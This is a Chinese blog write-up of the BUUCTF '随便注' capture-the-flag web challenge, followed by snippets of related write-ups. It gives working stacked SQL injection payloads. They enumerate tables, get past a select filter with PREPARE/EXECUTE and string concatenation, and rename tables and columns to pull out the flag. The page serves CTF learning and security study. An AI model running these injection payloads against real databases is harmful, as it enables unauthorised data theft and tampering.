buucrf-web-随便注

最新推荐文章于 2024-07-06 23:05:18 发布
原创 最新推荐文章于 2024-07-06 23:05:18 发布 · 1k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文探讨了SQL堆叠注入攻击方法,利用预定义语句绕过过滤,及通过修改表名直接获取敏感信息的创新思路,详细解析了操作流程与payload构造。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

又学到个姿势
这道题是sql堆叠注入
堆叠注入自行百度

在这里插入图片描述
同时有过滤
我们首先通过show语句确定了flag在哪个表里

?inject=1';show tables;#
?inject=1';show columns from `1919810931114514`;#

但是问题在于不能使用select等查询
做法是使用mysql预定义语句

PREPARE stmt from '你的sql语句';
EXECUTE stmt (如果sql有参数的话, USING xxx,xxx); // 这里USING的只能是会话变量
DEALLOCATE PREPARE stmt;

这三句话分别就是:
预定义好sql语句
执行预定义的sql
释放掉数据库连接

可以简单测试一下
在这里插入图片描述
发现成功执行插入语句

为什么要用这种做法绕过
因为可以发现,prepare之后的sql语句其实是一个字符串
就会发现对一个字符串来说,正则匹配是没有意义的
我们可以拼接我们想要的字符串然后执行
比如说过滤了select
我们可以通过拼接达到同样的效果concat(“sel”,“ect”)
同时可以通过设置变量来保存字符串set @a=
那么就很简单了
构造

?inject=1';
set @a=concat("sel","ect flag from `1919810931114514`");
prepare hello from @a;
execute hello;
#

发现还是不行
在这里插入图片描述
这里只匹配了小写
把set或者prepare换成大写就好了

?inject=1';
SET @a=concat("sel","ect flag from `1919810931114514`");
prepare hello from @a;
execute hello;#

拿到flag
在这里插入图片描述做法2:改表名
我们观察两个表的结构
这是那个一串数字的表
在这里插入图片描述

flag
xxxx

这是words表

在这里插入图片描述

iddata
xxxxx

在这里插入图片描述
所以猜测查到的数据其实是words表中的数据
查询语句大概是

select xxxxx from words where id = $_GET[inject]

那么就有另一个思路
如果我们把数字表的表名改为words
是不是就可以直接查到flag
而正好也没有过滤rename,alert

大概步骤就是
1.将words表改为其他名
2.将数字表改名为words
3.改列名,把列名flag改为id
这里为了方便观察,我多输了show tables和show columns的语句
下面是payload

http://05929a01-7bb6-428a-b840-10ff26c4607e.node1.buuoj.cn/
?inject=1' or 1=1;
rename tables `words` to `test`;rename tables `1919810931114514` to `words`;
show tables;show columns from words;
alter table `words` change `flag` `id` varchar(100);
show tables;show columns from words;

这是改完两个表名
在这里插入图片描述
这是改完列名
在这里插入图片描述
再执行一次payload

在这里插入图片描述

BUUCTF-Web-随便-wp
single7_的博客
12-14 464
0x01 知识点 SQL-堆叠入 sql预处理语句 巧用contact()函数绕过 0x02 知识铺垫 在SQL中,分号(;)是用来表示一条sql语句的结束。在分号(;)结束一个sql语句后继续构造下一条语句,而后根据结果判断两条甚至多条SQL语句会不会一起执行?这种入方式称为堆叠入。 union injection(联合入)是将两条语句合并在一起,两者之间有什么区别么?区别就在于 union 或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠入可以执行的是任意的语
从零开始的[BUUCTF-xor]
Almosttmr的博客
10-09 578
[BUUCTF-xor] 前言: 认识了简单的伪代码之后,要开始看复杂的了。 1. 在exeinfo中确认信息后,放入ida,找到main函数,f5查看伪代码 直接从网上扒来的图,因为我第一眼真的看不懂啊呜呜 逻辑具体是:首先判断我们的输入v6长度是否为33,不是就进入label_12,下面可以看到就是返回"Failed"。 然后i=1,v6[1]代表从输入的第二位开始,^=表示异或(即xor)。即把两个数据二进制化,对位相同则输出0,不同输出1,再以输出的二进制转换回来。 例子:5和3转为二进制分别为:
【BUUCTF】web之强网杯2019随便
12-14
开始入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠入: 库:1’;show databases;# 得到数据库 表:1’;show tables;# 得到俩个表 列:1’;show columns from ‘表名’;# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
BUUCTF-web-随便
nareku的博客
07-06 1436
输入1试试,可以看到是GET传参 判断一下是数字型入还是字符型入 可以看出来是字符型入了,接下来就是常规猜解SQL查询语句中的字段数输入 : 1' order by 1# 输入: 1' order by 2#输入: 1' order by 3# 说明字段数为2 常规使用联合查询输入: 1' union select 1,2# 发现一些常用的查询关键词都被过滤了捏,但是堆叠查询入貌似没有,试试堆叠查询入输入: 1' ; show databases;#说明堆叠查询入可行输入: -1' ;
BUUCTF【WEB】题:随便
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
11-12 574
可以发现,1919810931114514表中有个名为 flag 的字段,很可能该字段的值就是真正的 flag;:预编译相当于定一个语句相同,参数不同的Mysql模板,我们可以通过预编译的方式,绕过特定的字符过滤。进去之后,发现就一个输入框,测试一下是否存在 SQL 入,输入万能语句:1' or 1 = 1#将 select 转换成对应的 ASCII 码,从而绕过对 select 的过滤。发现表都爆出来了,说明存在 SQL 入漏洞,进一步测试一些其他语句是否可行。举例:查询 id = 1 的用户。
BUUCTF【Web随便(SQL入)
qq_70434663的博客
03-02 690
但是因为表过滤了select,所以使用rename先把words表改为其它的表名,在把1919810931114514表改为words表,给新的words表添加新的列名id,最后将flag改名为data。猜测是SQL入,我们随便输入1'(单引号为英文状态下输入)发现报错提示表明此为单引号的SQL入。第一步,测试入点(利用引号,and 1=1 ,or 1=1之类的判断是字符型还是数字型)我们发现在1919810931114514表里面爆出了flag字段,猜测flag就在里面。接下来,爆出两张表的内容。
BUUCTF_[ACTF2020 新生赛]Upload解题思路
时光不老的博客
01-10 644
[ACTF2020 新生赛]Upload
Buuctf之SimpleRev做法
最新发布
2303_80796023的博客
07-06 1117
此处的str2为下方的text(已知),key也为已知,采取爆破遍历算法,得到v1,即为flag,上代码。进来之后,我们进入main函数,发现里面没什么东西,那就shift+f12搜索字符串,找到关键字符串,双击进入。然后再选中该字符串,ctrl+x进入应用该字符串的函数,如下图。首先,查个壳,64bit,那就丢进ida64中进行反编译。得到结果flag{KLDQCUDFZO},提交即可。
BUUCTF MISC 解题思路及实现过程
Shuras1223的博客
04-02 5959
buuctf misc 题解及答案
BUUCTF web随便
渗透之路,攻防之间皆学问
11-21 2608
启动靶场访问如下,输入1',报错,可知是字符型入,变量由单引号包裹输入1' and 1=1 --+,显示正常先直接用sqlmap入一下,显示存在入,但是始终入不出来数据库,“[ERROR] unable to retrieve the number of databases”,猜想应该是存在字符过滤因为现在还不知道是什么原因导致的sqlmap入不出来,所以先尝试手。输入框中输入1和2显示的结果不同,像这种直接回显输入的最先尝试联合入。
buuctf web 随便
qq_41696858的博客
08-08 504
这题入点很好找,跟之前easy sql一样 先1’直接回显,找到入点 于是常用思路1’ union select 1,2# 把过滤字符都返回出来了 return preg_match("/select|update|delete|drop|insert|where|./i",$inject); 下面就是sql(mysql)知识时间 show语句没有过滤,所以可以开始 -1';show databases; -1';show tables; -1';show columns from `191981093
BUUCTF web 随便
H4ppyD0g的博客
09-19 795
堆叠入 在SQL中,分号是用来表示一条sql语句的结束。如果在 ; 结束一个sql语句后继续构造下一条语句,效果就是分别执行两条sql语句。由于两条语句堆叠在同一行,而不是原本应该各自占据一行,所以这种入成为堆叠入。 意1 当数字型字符作为字段、表、库名查询时,应该用反单引号括起来 输入 1 没有报错 1' 报错,证明存在入 1' # 没有报错 1' orde...
BUUCTF WEB 随便
guishengyx的博客
10-18 239
题目是入,于是尝试SQL入 order by 2得到两个字段 尝试联合查询时发现禁用了select 百度了解到堆叠查询 用;将语句隔开 发现可以使用堆叠入 继续查询表名 查询表中的字段名 0';show columns from words;-- qwe 查询1919810931114514表的时候出现了问题 百度了解到数字表名需要用反引号``括起来 0';show columns from `1919810931114514`;-- asd ...
BUUCTF Web [强网杯 2019]随便
热门推荐
wangyuxiang946的博客
10-25 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [强网杯 2019]随便一、题目简介二、思路分析1)判断入点2)选择入方式3)查看表中内容三、解题步骤1)获取表2)获取字段3)获取表中数据四、总结 一、题目简介 进入题目链接后,是一个「查询」功能,在输入框中提交id,即可返回「响应」的内容。 在输入框中输入一个2,即可.
Buuctf-Web-[强网杯 2019]随便
御七彩虹猫
05-13 308
Buuctf-Web-[强网杯 2019]随便
buuctf [强网杯 2019]随便
qq_1873822的博客
03-01 309
堆叠入原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠入。而union injection(联合入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql语句为: Select *
buuctf-web-[强网杯 2019]随便-wp
居上
06-22 1541
[强网杯 2019]随便 源码 (这题本身没有源码,源码是我从网上下载的便于学习) <html> <head> <meta charset="UTF-8"> <title>easy_sql</title> </head> <body> <h1>取材于某次真实环境渗透,只说一句话:开发和安全缺一不可</h1> <!-- sqlmap是没有灵魂的 --> <form
web 4.随便
yu_jing_hong的博客
08-18 222
首先,判断是否存在入,若输入1'发现不回显,输入1'#显示回显正常,那么就存在入 然后判断入是字符型还是数字型,输入1'or'1'=1回显正常,那么该入应该是字符型 第二步,猜解SQL查询语句中的字段数 输入1'order by 1#回显正常 再输入1'order by 2#,回显正常 直到输入1'order by 3#显示错误,那么字段数就有两个 第三步,显示字段,输入1'union select 1,2#回显一个正则过滤规则 过滤了select,u...
buuoj-随便
读万卷书,行万里路。
01-22 992
随便 首先,使用 1'进行测试,判断是否存在 SQL 入。从返回的结果可以看出,可能存在 SQL 入 使用 1'可以将 SQL 语句构造成 select * from table where id='1'' limit 0,1。不符合 SQL 语句,所以会导致报错。 使用截断语句 1' #进行截断处理,使得后面的限制语句失效(limit或者其他)。1’ #,而不是1 # 类似的截断语句还...
BUUCTF-随便(easy_sql)
weixin_51383898的博客
10-13 1056
启动靶机,首先有一个输入框,提交查询,返回一个数组将数值改成3,页面没有显示输入2,有结果,最大输入为2输入1'出现报错,参数为字符型,需要闭合单引号出现报错,尝试报错入,被过滤了使用联合入,过滤了关键字select,没有用尝试使用万能语句,好像没啥用,得到的信息和flag没有关联尝试使用堆叠入,成功了发现有个数据库,查看该数据库下有哪些表有个FLAG_TABLE表,查看table表有哪些字段不是flag???,看来这个数据库不得行进入supersqli。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值